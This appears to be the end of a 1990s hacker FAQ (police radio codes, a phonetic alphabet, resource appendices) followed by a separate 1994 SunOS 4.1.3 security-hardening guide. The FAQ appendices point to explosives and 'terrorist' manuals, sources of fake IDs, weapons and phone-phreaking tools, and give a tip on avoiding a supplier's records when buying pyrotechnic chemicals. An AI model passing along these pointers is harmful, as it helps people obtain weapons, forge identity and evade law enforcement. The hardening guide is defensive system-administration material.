10-45A Condition of patient is good.
10-45B Condition of patient is serious.
10-45C Condition of patient is critical.
10-45D Patient is deceased.
10-46 Sick person [amb. enroute]
10-48 Ambulance transfer call
10-49 Proceed to/Enroute to ______.
10-50 Subject is under the influence of narcotics./Take a report.
10-51 Subject is drunk.
10-52 Resuscitator is needed.
10-53 Person down.
10-54 Possible dead body.
10-55 This is a coroner’s case.
10-56 Suicide.
10-56A Suicide attempt.
10-57 Firearm discharged.
10-58 Garbage complaint
10-59 Security check./Malicious mischief
10-60 Lock out.
10-61 Miscellaneous public service.
10-62 Meet a citizen.
10-62A Take a report from a citizen.
10-62B Civil standby.
10-63 Prepare to copy.
10-64 Found property.
10-65 Missing person
10-66 Suspicious person.
10-67 Person calling for help.
10-68 Call for police made via telephone.
10-70 Prowler.
10-71 Shooting.
10-72 Knifing.
10-73 How do you receive?
10-79 Bomb threat.
10-80 Explosion.
10-86 Any traffic?
10-87 Meet the officer at ______.
10-88 Fill with the officer/Assume your post.
10-91 Animal.
10-91a Stray.
10-91b Noisy animal.
10-91c Injured animal.
10-91d Dead animal.
10-91e Animal bite.
10-91g Animal pickup.
10-91h Stray horse
10-91j Pickup/collect ______.
10-91L Leash law violation.
10-91V Vicious animal.
10-95 Out of vehicle-pedestrian/ Requesting an I.D./Tech unit.
10-96 Out of vehicle-ped. send backup
10-97 Arrived at the scene.
10-98 Available for assignment.
10-99 Open police garage door
10-100 Civil disturbance – Mutual aid standby.
10-101 Civil disturbance – Mutual aid request.

11-00 Series Code

11-10 Take a report.
11-24 Abandoned automobile.
11-25 Traffic hazard.
11-26 Abandoned bicycle.
11-27 10-27 with the driver being held.
11-28 10-28 with the driver being held.
11-40 Advise if an ambulance is needed.
11-41 An ambulance is needed.
11-42 No ambulance is needed.
11-48 Furnish transportation.
11-51 Escort.
11-52 Funeral detail.
11-54 Suspicious vehicle.
11-55 Officer is being followed by automobile.
11-56 Officer is being followed by auto containing dangerous
persons.
11-57 An unidentified auto appeared at the scene of the assignment.
11-58 Radio traffic is being monitored. Phone all non-routine
messages.
11-59 Give intensive attention to high hazard/business areas.
11-60 Attack in a high hazard area.
11-65 Signal light is out.
11-66 Defective traffic light.
11-78 Aircraft accident.
11-79 Accident – ambulance has been sent.
11-80 Accident – major injuries.
11-81 Accident – minor injuries.
11-82 Accident – no injuries.
11-83 Accident – no details.
11-84 Direct traffic.
11-85 Tow truck required.
11-94 Pedestrian stop.
11-95 Routine traffic stop.
11-96 Checking a suspicious vehicle.
11-97 Time/security check on patrol vehicles.
11-98 Meet: _______
11-99 Officer needs help.

900 Series Codes

904 Fire.
904A Automobile fire.
904B Building fire.
904G Grass fire.
909 Traffic problem; police needed.
910 Can handle this detail.
932 Turn on _______ mobile relay at _______.
933 Turn off mobile relay.
949 Burning inspection at _______.
950 Control burn in progress/about to begin/ended.
951 Need fire investigator.
952 Report on conditions.
953 Investigate smoke.
953A Investigate gas.
954 Off the air at the scene of the fire.
955 Fire is under control.
956 Assignment not finished.
957 Delayed response of __ minutes.
980 Restrict calls to emergency only.
981 Resume normal traffic.
1000 Plane crash
3000 Road block

Other Codes

Code 1 Do so at your convenience.
Code 2 Urgent.
Code 3 Emergency/lights and siren.
Code 4 No further assistance is needed.
Code 5 Stakeout.
Code 6 Responding from a long distance.
Code 7 Mealtime.
Code 8 Request cover/backup.
Code 9 Set up a roadblock.
Code 10 Bomb threat
Code 12 Notify news media
Code 20 Officer needs assistance
Code 22 Restricted radio traffic
Code 30 Officer needs HELP – EMERGENCY!
Code 33 Mobile emergency – clear this radio channel.
Code 43 TAC forces committed.
AID Public Safety Assistance

Phonetic Alphabet

A Adam N Nora
B Boy O Ocean
C Charles P Paul
D David Q Queen
E Edward R Robert
F Frank S Sam
G George T Tom
H Henry U Union
I Ida V Victor
J John W William
K King X X-ray
L Lincoln Y Yellow
M Mary Z Zebra

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE SEQUENCE TO REPORT DATA FOR A STANDARD DESCRIPTION?

Vehicles

Item Example

1. Color Red over black
2. Year 1984
3. Make Cadillac
4. Body Two door
5. License plate 6VWH926 (given phonetically!)

Persons
1. Name
2. Race
3. Sex
4. Age
5. Height
6. Weight
7. Hair color
8. Eye color
9. Complexion
10. Physical marks, tattoos, scars, limps, etc.
11. Clothing (head to feet)
a. Hat
b. Shirt;tie
c. Coat
d. Trousers
e. Socks
f. Shoes

=====================================================================
Appendix A. FTP sites with useful info:

ftp.eff.org
wiretap.spies.com
hpacv.com (mail postmaster@hpacv.com for info first)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cpsr.org /cpsr
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/
black.ox.ac.uk Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov \ These two sites will give you
martini.eecs.umich.edu 3000 / whatever info you need about any city.

=====================================================================
Apendix B. Interesting gophers:

gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu

=====================================================================
Appendix C. Informative USENET Newsgroups

alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
comp.virus
comp.unix.admin
comp.protocols.tcp-ip

Also try IRC #hack. *** WARNING: May be lame at times!!! ***

=====================================================================
Appendix D. Publications and Zines

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2600:The Hacker Quarterly

a technical journal put out by hackers

mail: email:
2600 2600@well.sf.ca.us
PO Box 752 emmanuel@well.sf.ca.us
Middle Island, NY 11953
PH:516-751-2600

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PHRACK

The electronic journal of hackers and phreakers.

Email: phrack@well.sf.ca.us

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WIRED

The magazine of the cyberculture.

Email: subscription@wired.com
info@wired.com

Or look for it on many newsstands.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fringe Ware Review

Email: fringeware@io.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Iron Feather Journal

Mail:
IFJ
PO Box 1905
Boulder CO 80306

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Groom Lake Desert Rat

Email: psychospy@aol.com

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Cybertek: The Cyberpunk Technical Journal

Mail:
Cybertek
PO Box 64
Brewster NY 10509

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

LineNoiz

Email: dodger@fubar.bk.psu.edu
with
‘subscription linenoiz
in the body of the message

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For more info on Zines then check out Factsheet Five and
Factsheet Five Electronic.

email: jerod23@well.sf.ca.us

=====================================================================
Appendix E. Books

APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well
worth it to anyone into crypto.

Davis, Tenney L.: “Chemistry of Powder and Explosives.”

Hogan, Thom: “The Programmer’s PC Sourcebook” (Microsoft Press)

Russell: “Computer Security Basics”

Cornwall: “The (New) Hacker’s Handbook”

“Cyberpunk” (forget the authors)

Kochan & Wood: “UNIX System Security”

Spafford & Garfinkel: ” Practical UNIX Security”

Stohl, Clifford: “The Cuckoo’s Egg”

Gasser, Morrie: “Building a Secure Computer System

THE RAINBOW SERIES
Can be obtained free from:
INFOSEC Awareness Office
National Computer Security Centre
9800 Savage Road
Fort George G. Meade, MD 20755-6000
Tel: 1-301-766-8729

“The Improvised Munitions Manual”

=====================================================================
Appendix F. Files and Papers.

Morris & Thompson: “Password Security, A Case History”

Curry: “Improving the Security of your UNIX System”
available via FTP as ‘security-doc.tar.Z’

Klein: “Foiling the Cracker: A Survey of, and Improvements to,
Password Security.”
Archie search for ‘Foiling’

Cheswick: “The Design of a Secure Internet Gateway”
available from research.att.com
/dist/Secure_Internet_Gateway.ps

Cheswick: “An Evening with Berford: in which a Cracker is Lured,
Endured and Studied”
available from research.att.com
/dist/berford.ps

Bellovin89: “Security Problems in the TCP/IP Protocol Suite”
available from research.att.com
/dist/ipext.ps.Z

Bellovin91: “Limitations of the Kerberos Authentication System”
available from research.att.com

CERT: many various bits of info collected at cert.sei.cmu.edu

“Open Systems Security”
available from ajk.tele.fi(131.177.5.20)
/PublicDocuments

RFC-1244: “The Site Security Handbook”

“The Terrorist’s Handbook”
how to make various explosive, propellants and
ignitors and also how to apply and use them

=====================================================================
Appendix G. Catalogs

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lockpicks
(from Belisarius)

You can get lockpicks from:

American Systems
2100 Roswell Road
Suite 200C-223
Marietta, GA 30062

Lock Pick Sets
==============
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.

Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.

Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Explosives and other underground stuff

Loompanics is one of the major distributors of material relating to
the underground including explosives. You can get the catalog by
mailing:
Loompanics Unlim
P.O. Box 1197
Port Townsend, Wash 98368

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)

NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA 71135-5950
Phone: (318) 688-1365 FAX: (318) 688-1367

NIC offers ids of ALL types just about, as well as how-to manuals on
EVERYTHING, posters, lock stuff, electronic surveillance stuff.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Weapons, explosives, survival gear.
(from CyberSorceror)

Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO 80439
(303) 277-0305

Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you’d ever have time to read.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Paladin Press
PO Box 1307
Boulder, CO 80306

Enclose $2 for the publishers of the “Action Library”.
Books on lockpicking, wiretapping, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

US Cavalry Catalog
Army field manuals, etc.
Interesting hardware, just about any military equipment (no firearms)

Their Customer Service Number is as follows:
1-800-333-5102
Their Hours are:
9am-9pm, Monday-Friday

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For beige boxing, data com cracking/patching tools try:
TIME MOTION TOOLS
12778 BROOKPRINTER PLACE
POWAY, CA 92064-6810

(619) 679-0303
(800) 779-8170

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Chemicals and lab equipment!! Only requires SIGNATURE for proof of
age!
(from Neurophyre)

Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI 54220

Send a crisp $1 bill and a request for a catalog. Tip: Don’t order
all your pyro stuff from here. They DO keep records. Be safe.

=====================================================================
Appendix H. PGP keys

None available currently …

=====================================================================

*********************************************************************
************************ END OF THE HACK-FAQ! ***********************
*********************************************************************
***** Therefore, determine the enemy’s plans and you will know ******
***** which strategy will be successful and which will not. ******
***** — Sun Tzu, The Art of War ******
*********************************************************************
*********************************************************************

How to improve security on a newly installed SunOS 4.1.3 system. by Thomas M. Kroeger (July 1994)

From tmk@uhunix.uhcc.Hawaii.Edu Thu Jun 30 08:54:17 EDT 1994
Subject: How to improve security on a newly installed SunOS 4.1.3 system.
Summary: How to improve security on a newly installed SunOS 4.1.3 system.
X-Newsreader: TIN [version 1.2 PL2]
Date: Thu, 30 Jun 1994 09:39:10 GMT

My appologies for taking so long with this it became much larger than
I’d though it would.
Please Note:
1) My intent in this was to limit my audience enough so that
this document would not become too large and cumbersome.
Please note the intended audience.
2) This document is sure to undergo revision, and I hesitate to
ever call any revision a final draft.
3) Please forgive any typo’s and gramatical errors. It’s late
and I wanted to get this out on a day other than Friday.
Send me notes of typos and spelling directly don’t bother
the rest of the net with such.
4) I’ll try to post when I’m able to put this list up on our
ftp server ftp.Hawaii.Edu:/pub/security.

Again many thanks to all those who provided feedback.

I’m not sure where the other lists are but here’s what I’ve got,
please let me know if it’s of help:

———————————————————————-

How to improve security on a newly installed SunOS 4.1.3 system.

Version 1.0..Thomas M. Kroeger – July 94
….tmk@hawaii.edu

Copyright — Thomas M. Kroeger – July 94
Please feel free to redistribute or include this list or parts of it
wherever you desire, but, please include appropriate citation.

Goal –
Attempt to provide a list of some of the more basic steps that
can be done to improve security on a newly installed SunOS 4.1.3 system.
This is by no means an all inclusive list of actions, just a list of
some simple and more common measures.

Intended Audience –
Anyone responsible for the system administration duties of a machine
running SunOS 4.1.3. These recommendations applicable to a stand-alone *
workstation. It is assumed that the reader has some familiarity with basic
system administration (you should be able to do a basic system installation
by yourself, install patches, and use an editor).

[* which may be connected to a larger network?]

NOTE: This list limits it’s coverage to measures that can
be done for a stand-alone workstation addition to the steps listed here
there are many measures that can be taken to improve the security of
an enviornment, measures such as; filtering traffic to port 2049/udp
at the routers will prevent NFS calls from outside your domain.

Disclaimer —
These recommendations come with no guarantees of anything! Support is only
offered within the University of Hawai’i community.

The truly paranoid may wish to these implement these recommendations while in
single user mode as an extra measure of security to avoid possible subversive
shenannigans by a wily cracker.

.
To Do on a system Just installed
——————————

Patches —
+ install the following patches

4.1.3 Security listing
100103 SunOS 4.1;4.1.1;4.1.2;4.1.3: script to change file permissions
100173 SunOS 4.1.1/4.1.2/4.1.3 : NFS Jumbo Patch
* 100224 SunOS 4.1.1,4.1.2,4.1.3: /bin/mail jumbo patch
100257 SunOS 4.1.1;4.1.2;4.1.3: jumbo patch for ld.so, ldd, and ldconf
100272 SunOS 4.1.3: Security update for in.comsat.
100296 SunOS 4.1.1, 4.1.2, 4.1.3: netgroup exports to world
100305 SunOS 4.1.1, 4.1.2, 4.1.3: lpr Jumbo Patch
100372 SunOS 4.1.1;4.1.2;4.1.3: tfs and c2 do not work together
* 100377 SunOS 4.1.1, 4.1.2, 4.1.3: sendmail jumbo patch
* 100383 SunOS 4.0.3;4.1;4.1.1;4.1.2;4.1.3: rdist security and hard link
100448 OpenWindows 3.0: loadmodule is a security hole.
100452 OpenWindows 3.0: XView 3.0 Jumbo Patch
100478 OpenWindows 3.0: xlock crashes leaving system open
* 100482 SunOS 4.1;4.1.1;4.1.2;4.1.3: ypserv and ypxfrd fix, plus DNS fi
100507 SunOS 4.1.1, 4.1.2, 4.1.3: tmpfs jumbo patch
100513 SunOS 4.1.1;4.1.2;4.1.3: Jumbo tty patch
100564 SunOS 4.1.2, 4.1.3: C2 Jumbo patch
* 100593 SunOS 4.1.3: Security update for dump.
100623 SunOS 4.1.2;4.1.3: UFS jumbo patch
100630 SunOS 4.1.1, 4.1.2, 4.1.3: SECURITY: methods to exploit login/su
100631 SunOS 4.1.x: env variables can be used to exploit login(US only)
* 100632 SunSHIELD 1.0: ARM jumbo patch release
100890 SunOS 4.1.3: domestic libc jumbo patch
100891 SunOS 4.1.3: international libc jumbo patch
100909 SunOS 4.1.1;4.1.2;4.1.3: Security update for syslogd.
101072 SunOS 4.1.1;4.1.2;4.1.3: Non-related data filled the last block
101080 SunOS 4.1.1 4.1.2 4.1.3: security problem with expreserve
101200 SunOS 4.1.1, 4.1.2, 4.1.3: Breach of security using modload
101206 ODS 1.0; NFS/fsirand security fix.
* 101480 SunOS 4.1.1;4.1.2;4.1.3: Security update for in.talkd.
* 101482 SunOS 4.1.3, 4.1.2, 4.1.1: Security update for write.
101640 SunOS 4.1.3: in.ftpd logs password info when -d option is used.
101710 ONLINE DISKSUITE (ODS) 1.0: Security update for dump.

4.1.3 U1 security listing
101434 SunOS 4.1.3_U1: lpr Jumbo Patch
* 101435 SunOS 4.1.3_U1: ypserv fix
* 101436 SunOS 4.1.3_U1: bin/mail jumbo patch
101440 SunOS 4.1.3_U1: security problem: methods to exploit login/su
101558 SunOS 4.1.3_U1: international libc jumbo patch
* 101579 SunOS 4.1.3_U1: Security problem with expreserve for Solaris 1.
101587 SunOS 4.1.3_U1: security patch for mfree and icmp redirect
101590 ONLINE DISKSUITE (ODS) 1.0, NFS/fsirand security fix
101621 SunOS 4.1.3_U1: Jumbo tty patch
* 101665 SunOS 4.1.3_U1: sendmail jumbo patch
101679 SunOS 4.1.3_U1: Breach of security using modload
101759 SunOS 4.1.3_U1: domestic libc jumbo patch

* – Note: some patches may not be required if you are disabling this
feature. If this is the case, ensure that all relevant files have had
their mode changed to remove the SUID bit — chmod u-s .

Note 2: Some patches may not necessarily apply based on packages
installed (US Encryption…) or your configuration. Please carefully
check the README for each patch.
Patches are available via anonymous ftp from
ftp.uu.net:/system/sun/sun-dist
.
Network level changes ——-

+ Disable source routing
Why:
Source routing enables the originating host to dictate the route the
packet will take. This can be used to spoof a system into believing
that the packets are coming from a trusted source.
How:
Install patch found in Ref. 19
More info: Ref. 2 [Cheswick 94] Chap 2, Ref. 19

+ Comment out all unnecessary services in /etc/inetd.conf
Why:
RPC services can be used to gain access as well as information about
a system. These are very site specific adjustments and will have to
be tailored to your needs. Additionally, TCP wrappers [Ref. 4] can be
used to improve loging, prevent IP spoofing (one host pretending to be
another to gain access) and limit access to a service as well as
totally removing it.
How:
Edit file /etc/inetd.conf and put a # in front of services that
are not needed.

Services possibly needed, but probably desired:
.ftp – possible needed for file transfer, however if all you
. want is outgoing ftp then this is can be commented out.
.telnet – obvious (recommend restricting with TCP wrappers Ref. 4)
.finger – Possibly but better to get a modified version that doesn’t
.. give up that much information (To be honest I have no
experience with any of these I’d recommend checking into
some of the ones on ftp.uu.net).
.talk – nice to have but how much will you miss it?

Services which are probably unnecessary – see man pages for details
.name – for name services (man tnamed)
.comsat – for mail – not necessary.
.login – for rlogin – please see discussion under ruserok().
.uucp – if you aren’t sure if your using this then you are not.
.exec – services for rexecd – do without.

Services recommended against – FIND A WAY TO LIVE WITHOUT.
.shell – for rsh — major source for security problems
.tftp – only needed for support of an X terminal or diskless
clients, doubtfully needed on a desktop machine.
More info: Ref. 4 [Venema 92]., Ref. 15

+ Enable NFS port monitoring (This is of value only if you are exporting
filesystems over NFS)
Why:
Port monitoring ensures that calls to NFS to mount a file system come
from a port < 1024 (in other words, a port that requires root access to use). How: The default /etc/rc.local sets up port monitoring only if the file /etc/security/passwd.adjunct exists. If you will be implementing shadowing then you can skip over this step. If you will not be implementing shadowing and you will be exporting files then you should modify /etc/rc.local to do the following 2 lines: (regardless of whether the passwd.adjunct file exists): echo "nfs_portmon/W1" | adb -w /vmunix /dev/kmem > /dev/null 2>&1
rpc.mountd

Shadowing is covered under the section Changes to ID Management.

Note: one possible side effect: non-sun nfs client might not
be able to mount exported files.
More info: Ref. 3 [Stern 92] pg 177 & mountd(8C)

+ Ensure that ypbind is started with the -s option.
Why:
Users could easily start thier own ypbind services and activate a
phony NIS database giving them access as any user.
How:
As with port monitoring the default /etc/rc.local sets up ypbind in the
secure mode (-s option) only if the file /etc/security/passwd.adjunct
exists. If you will be implementing shadowing then you can skip over
this step, overwise you should modify /etc/rc.local to start ypbind
with the -s option regardless of whether the passwd.adjunct file exists.
More info: ypbind(8)

+ Disable IP forwarding –
Why:
I’m not sure if this can be abused on a machine with only one interface
but I’d rather err of the side of safety. It could be used to spoof
an IP address.
How:
Install the following line in the kernel configuration file:
options “IPFORWARDING=-1”
For info on how to custom configure a kernel, see the file
/usr/sys/`arch`/conf/README.

.
Kernel changes ——-

+ modify ruserok() in /usr/lib/libc.so.1.8 (9 on 4.1.3 U1) to disable:
– root .rhosts authentication, wildcards in .rhosts, or
.rhosts entirely depending on the level of security you want.
Why:
ruserok() is a library routine that does the checking of both the
.rhosts and /etc/hosts.equiv files for all the r commands.
a) ruserok() uses the source IP address in the rpc request for
authentication. There are no guarantees that this address is correct.
This address can easily be spoofed, yielding illegitimate access to
a system.
b) Crackers will often insert +’s into users’ .rhosts file
to allow them to gain access at a latter date. Most users
don’t look at their .rhosts file too often.
Note: While using .rhosts prevents crackers from sniffing your users’
passwords, it also make them vulnerable to IP spoofing (claiming
to be a host that you’re not) it becomes a matter of preference
what level of protection you’d choose here.

How:
To modify the source code requires a source code license.
At Univ of Hawaii, modified version of libc.so.1.8 should be
available though the systems group.

For those who wish to create thier own modified version of ruserok()
please see the section at the end that describes some of the details
for creating a custom libc.so.

Additionally the logdaemon package Ref. 15 has a modified version
of libc.so that helps with this. This site also has BSD sources
for the ruserok() routine.

Finally TCP wrappers can also be used to restrict access to each
individual r command. Ref. 4

More info: ruserok(3), hosts.equiv(5),
source code file /lib/libc/net/rcmd.c, Ref. 4, Ref. 15

Filesystem change———-

+ create the file /etc/ftpusers
Why:
This file is a list of users that will not be allowed to access the
system via ftp. This prevents Joe Cracker from using ftp to
modify a file (such as /etc/passwd) if he is able to determine your
root password.
How:
create the file /etc/ftpuser with the following entries (one per line):
root, nobody, daemon, sys, bin, uucp, news, ingres, AUpwdauthd,
AUyppasswdd, sysdiag, sundiag, and any other ID’s that exist that
you don’t want to allow ftp access.

More info: man ftpusers(5)

+ Remove the + in /etc/hosts.equiv
Why:
Well….. Everyone gains access with this.
Note: This file should not have any comment lines.
More info: hosts.equiv(5)

+ edit /etc/exports remove all entries you don’t want exported.
– ensure whatever entries remain have restricted access
Why:
NFS leaves the normal file system protection up to the client
instead of the server. Acracker with root access on a client can
work around many of these protections. As a result filesystems
exported to the world are particularly vulnerable.
How:
Edit the file /etc/exports
1) Only export what you need to export. If you aren’t certain that
it needs to be exported, then it probably doesn’t.
2) Never export to the world. Use a -access=host.foo.bar.edu option.
3) When ever possible export the file systems read-only. option ro
You can use showmount -e to see what you currently have exported.

More info: exports(5), exportfs(8), showmount(8)

+ Install random number inode generator on filesystems fsirand
Why:
Predicable root handles assists crackers in abusing NFS. After
installing the patch for fsirand you’ll need to run fsirand for
all your filesystems.
How:
Ensure the filesystem is unmounted and run fsirand.
More info: fsirand(8), SunOS patch 100173 (NFS Jumbo)

+ nosuid in mounts
Why:
Use the nosuid option when adding entries to /etc/fstab to mount a
filesystem exported by another host. Anyone gaining access to the
other host can create or modify an existing program which could
compromise your system. Note: this doesn’t work on tmpfs filesystems.
How:
Include the nosuid when you add an entry to /etc/fstab to import
a filesystem.
More info: Ref. 3 [Stern 92] pg. 175 fstab(5)

+ Edit /etc/ttytab to remove the secure option from all entries.
Why:
The secure entry in /etc/ttytab allows logins directly to root on that
tty. If you feel that your machine is not in a physically secure
location, you may choose to remove the secure option from the
console as well.
More info: ttytab(5)

+ Set eeprom secure field to command or full –
Why:
If you feel that your machine is not in a secure location, then
the eeprom field secure can be used to prevent unauthorized root
access by crashing your machine. Note: with the full option the
system will not auto-reboot and will wait for the root password to
be entered.
More info: eeprom(8)

+ chmod 600 /dev/eeprom –
Why:
Prevents users from reading the eeprom passwd.
More info: eeprom(8)

+ Remove openprom support if you do not intend to use the eeprom
secure field.
Why:
A cracker who gains root access could install an eeprom password and
make your life a bit harder.
How:
Remove the device driver from the kernel by commenting out
the following:

# The “open EEPROM” pseudo-device is required to support the
# eeprom command.
#
pseudo-device openeepr # onboard configuration NVRAM
More info: eeprom(8)

+ Uncomment security options in frame buffer table file /etc/fbtab
Why:
Without these entries ownership of console devices will not be properly
set.
More info: fbtab(5)

+ add umask 022 to /etc/rc & /.login
Why:
Prevent key files created during startup and root operation from
being created world writeable. Note you may want to set umask in
/.login to 077 instead of 022
More info: umask(1), rc(8)

+ chmod go-w /etc/* ; chmod g+w /etc/dumpdates
Why:
None of these file in /etc should require write access
by world except for dumpdate, which requires group write access.
More info: chmod(1), aliases(5), state(5), utmp(5V), remote(5), rmtab(5)

+ edit /etc/rc.local to comment change part that chmod’s 666 motd
Why:
/etc/motd is the normal system’s message of the day; it won’t
allow people to gain root access, but it could be a nuisance if they
can change this anonymously. Additionally it is important to
ensure that the line “rm -f /tmp/t1” is at the begining of this part.

+ Chmod u-s the following files unless you specifically use them:
Why:
Changing the modes for those file which you will not be using
helps prevent would be crackers from exploiting unknown security
flaws in these files which could be used to compromise your system.

/usr/bin/cu ./usr/bin/tip ../usr/bin/fusage .
/usr/bin/nsquery ./usr/bin/uucp ../usr/bin/uuname
/usr/bin/uustat ./usr/bin/uux ../usr/ucb/rcp
/usr/ucb/rdist ./usr/ucb/rlogin ./usr/lib/uucp/uusched
/usr/lib/uucp/uuxqt /usr/ucb/rsh../usr/lib/uucp/uucico
/usr/games/hack /usr/games/chesstool ./usr/games/fortune
/usr/lib/exrecover /usr/games/robots ./usr/lib/uucp/remote.unknown
/usr/games/hack ./usr/games/snake./usr/bin/sunview1/sv_release
/usr/etc/rfsetup
/usr/bin/allocate – used with C2 security.
/usr/ucb/quota – used with disk quotas
/usr/lib/expreserve – used to recover edit session that died.

Following may only be needed to be run by user root; as such, they would
not need to be SUID root:
/usr/etc/shutdown /usr/lib/acct/accton

More info: lots of man pages 😉

+ chmod g-s the following file unless you specifically use them:
Why:
Changing the modes for those file which you will not be using helps
prevent would be crackers from exploiting unknown security flaws
in these files which could be used to compromise your system.

/usr/bin/wall ./usr/etc/trpt../usr/bin/sunview1/toolplaces
/usr/bin/iostat ./usr/bin/ipcs ../usr/ucb/vmstat
/usr/ucb/netstat ./usr/etc/arp ../usr/etc/dmesg
/usr/etc/dkinfo ./usr/etc/chill ../usr/etc/dumpfs
/usr/etc/devinfo ./usr/etc/nfsstat ./usr/old/perfmon
/openwin/bin/xload ./usr/kvm/pstat ../usr/kvm/crash
/usr/kvm/getcons ./usr/etc/kgmon ../usr/etc/trpt

More info: lots of man pages 😉

+ edit syslog.conf — uncomment auth & mail lines
Why:
The enables improved loging of logins and su’s be prepared for lots of
data.
More info: syslog.conf(5)

+ chmod 640 /vmunix; chgrp kmem /vmunix ;
Why:
Prevent crackers from finding out more about your kernel configuration.

.
Changes to ID management ——

+ Disable SUID passwd (if using NIS) or -F option in /bin/passwd
Why:
Here two options exist:
1) you are using NIS for your user database; so you don’t need
/bin/passwd (and the two hard links to it /bin/chfn & /bin/chsh)
to be SUID root.
2) You will have local entries in your /etc/passwd that you would
like to be able to change thier own passwd. Then please note that
/bin/passwd has a race condition that can be exploited to write to
files as root, allowing a cracker to gain root access.

In either case yppasswd (and ypchfn & ypchsh) does not need to
be SUID root.
How:
In all cases – cd /bin; chmod u-s yppasswd ypchfn ypchsh
Option 1 – cd /bin; chmod u-s passwd chfn chsh
Option 2a – Replace passwd with a proactive (check for bad passwds)
passwd program. Ref 7.
Option 2b – Do a binary edit of passwd (sun’s code) as shown below:
# cd /bin
# cp passwd passwd.old; chmod 700 passwd.old
# adb -w – passwd
not core file = passwd
/l ‘F:’
0x68de This address is required in the following step:
0x68de/w 0
0x68de: 0x463a = 0x0

# chmod 4711 /bin/passwd
Note: The following files should all contain the same code, and
be SUID root (unless chmod u-s was done above). If you intend
to use any of these, ensure they are a link to the modified
file /bin/passwd: yppasswd, ypchfn, ypchsh, chfn, chsh.
More info: Ref. 6 [8lgm]-Advisory-7.UNIX.passwd.11-May-1994.NEWFIX

+ remove ID sync:::
Why:
This ID is created to enable the admin to sync the file system before a
system crash. It defaults without and password, and can be abused to
gain access to the system. The simplest solution is to live without
this feature and remove this ID.
More info: passwd(5)

+ Implement shadowing
Why:
To restrict access to all users’ encrypted passwords. Even though
passwords are encrypted, Crack (a publicly available program) can
be used to effectively guess users’ passwords.
How:
This can be done two different ways:
1. by implementing Sun’s C2 security package, which
provides additional auditing. I’ve found that this auditing can be
troublesome to maintain and I didn’t have need for the extensive data.
2. the second option is to implement shadowing but not C2, this
procedure is fully explained in detail in Ref. 5. In short:
– ensure patch 100564 is installed, (note this also implements
securenets for NIS)
– split /etc/passwd into /etc/passwd & /etc/security/passwd.adjunct
– split /etc/group into /etc/group & /etc/security/group.adjunct
– add required Audit users (even if not implementing auditing)
– comment out the part of rc.local that starts audit
– reboot.
